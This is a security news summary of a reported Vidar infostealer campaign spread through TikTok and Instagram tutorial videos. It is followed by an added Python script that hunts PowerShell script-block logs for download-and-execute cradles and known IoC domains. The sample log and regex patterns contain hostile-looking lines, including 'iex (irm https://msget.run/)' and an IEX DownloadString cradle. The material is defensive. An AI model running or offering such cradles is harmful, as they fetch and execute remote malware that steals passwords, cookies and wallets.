Overview
- Security firm ReversingLabs disclosed in mid-June that threat actors are running two coordinated campaigns on TikTok and Instagram Reels that pose as tutorials promising free premium software to distribute the Vidar infostealer.
- One campaign posted polished, Windows‑branded videos instructing viewers to open PowerShell and paste an iex irm-style command (Invoke-Expression wrapped around Invoke-RestMethod), which fetches a script over HTTP and runs it in memory with no visible download. The researchers confirmed that these commands retrieved Vidar from lookalike domains such as msget.run.
- The second campaign used comment-bait clips to funnel interested users to external sites such as d4ug.site that require surveys and redirects, preventing researchers from confirming the final payload delivered through those gated flows.
- ReversingLabs found the clips gained strong algorithmic traction (one tracked video recorded about 109,000 views with thousands of saves and shares), and the researchers reported that platform moderation failed: their abuse reports were rejected and warning comments posted under the videos were deleted.
- Researchers warned that Vidar, a long-running infostealer sold as malware‑as‑a‑service that steals passwords, browser cookies, crypto wallets, and some 2FA-related data, has improved its evasion since an October 2025 update. They urged organisations to audit who can install software and run scripts, enforce MFA, extend phishing training to cover social‑media lures, deploy up-to-date endpoint protection, and use the published IoCs to hunt for related activity.
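The paste-into-PowerShell cradle in the first campaign and the IoC-driven hunting the researchers recommend can both be exercised against PowerShell script-block logs (event 4104 in Microsoft-Windows-PowerShell/Operational). The script below is an added example, not ReversingLabs' tooling or code from the page: it flags script blocks that combine an execute cmdlet (iex/Invoke-Expression) with a network-fetch cmdlet (irm/iwr/DownloadString), and raises severity when a URL host matches a known IoC domain. The flat `<timestamp> <event id> <ScriptBlockText>` line format, the sample log entries, and the `example.invalid` and `updates.microsoft.com` hosts are constructed for illustration; only msget.run and d4ug.site come from the report.

```python
"""Hunt PowerShell script-block logs for iex/irm download cradles and known IoC domains.

Added example (not ReversingLabs' or the page's own code). Assumes log entries shaped
like Windows PowerShell Operational event 4104 (ScriptBlockText), flattened into
"<timestamp> <event id> <script text>" lines; the SAMPLE_LOG entries are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Domains named in the report; extend this from the published IoC list.
IOC_DOMAINS = {"msget.run", "d4ug.site"}

# Cmdlets (and their Windows PowerShell aliases) that evaluate text as code.
EXEC_PATTERN = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)
# Cmdlets/aliases and .NET calls that pull content from the network.
FETCH_PATTERN = re.compile(
    r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|curl|wget)\b|\.downloadstring\(",
    re.IGNORECASE,
)
URL_PATTERN = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)


@dataclass
class Finding:
    timestamp: str
    severity: str
    reason: str
    script: str


def extract_hosts(script: str) -> set[str]:
    """Return the lowercase hostname of every http(s) URL in the script block."""
    return {m.group(1).lower() for m in URL_PATTERN.finditer(script)}


def analyze_block(timestamp: str, script: str) -> Finding | None:
    """Classify one script block: IoC hit > download-and-execute cradle > nothing."""
    ioc_hits = extract_hosts(script) & IOC_DOMAINS  # exact match only; lookalike
    cradle = bool(EXEC_PATTERN.search(script) and FETCH_PATTERN.search(script))
    if ioc_hits:
        return Finding(timestamp, "high",
                       "known IoC domain: " + ", ".join(sorted(ioc_hits)), script)
    if cradle:
        # Fetch alone is normal admin activity; fetch feeding iex is the cradle.
        return Finding(timestamp, "medium",
                       "download-and-execute cradle (iex + network fetch)", script)
    return None


def parse_4104(line: str) -> tuple[str, str] | None:
    """Split a constructed flat line; ignore anything that is not event 4104."""
    parts = line.split(" ", 2)
    if len(parts) != 3 or parts[1] != "4104":
        return None
    return parts[0], parts[2]


def hunt(lines: list[str]) -> list[Finding]:
    """Run every 4104 entry through analyze_block and collect the findings."""
    findings: list[Finding] = []
    for line in lines:
        parsed = parse_4104(line)
        if parsed is None:
            continue
        finding = analyze_block(*parsed)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample log: one IoC-domain cradle, one generic cradle, two benign
# entries, and one non-4104 event that must be skipped.
SAMPLE_LOG = [
    "2025-06-10T14:02:11Z 4104 iex (irm https://msget.run/)",
    "2025-06-10T14:05:40Z 4104 IEX (New-Object Net.WebClient)"
    ".DownloadString('https://example.invalid/x.ps1')",
    "2025-06-10T14:07:02Z 4104 Get-ChildItem C:\\Users | Sort-Object Length",
    "2025-06-10T14:09:30Z 4100 Error processing script",
    "2025-06-10T14:11:15Z 4104 Invoke-RestMethod https://updates.microsoft.com/ | Out-Null",
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"[{f.severity}] {f.timestamp} {f.reason}: {f.script}")
```

Script-block logging is off by default and must be enabled (Group Policy: "Turn on PowerShell Script Block Logging") before 4104 events exist to hunt; on a live host the text comes from `Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational` rather than a flat file. Note that the benign `Invoke-RestMethod` line is deliberately not flagged: a fetch on its own is routine, and alerting on it would bury the cradle in noise. The `curl` and `wget` aliases exist only in Windows PowerShell 5.1, and the IoC check is an exact match, so a new lookalike domain needs to be added to `IOC_DOMAINS` (or caught by a separate typosquat heuristic) before this picks it up.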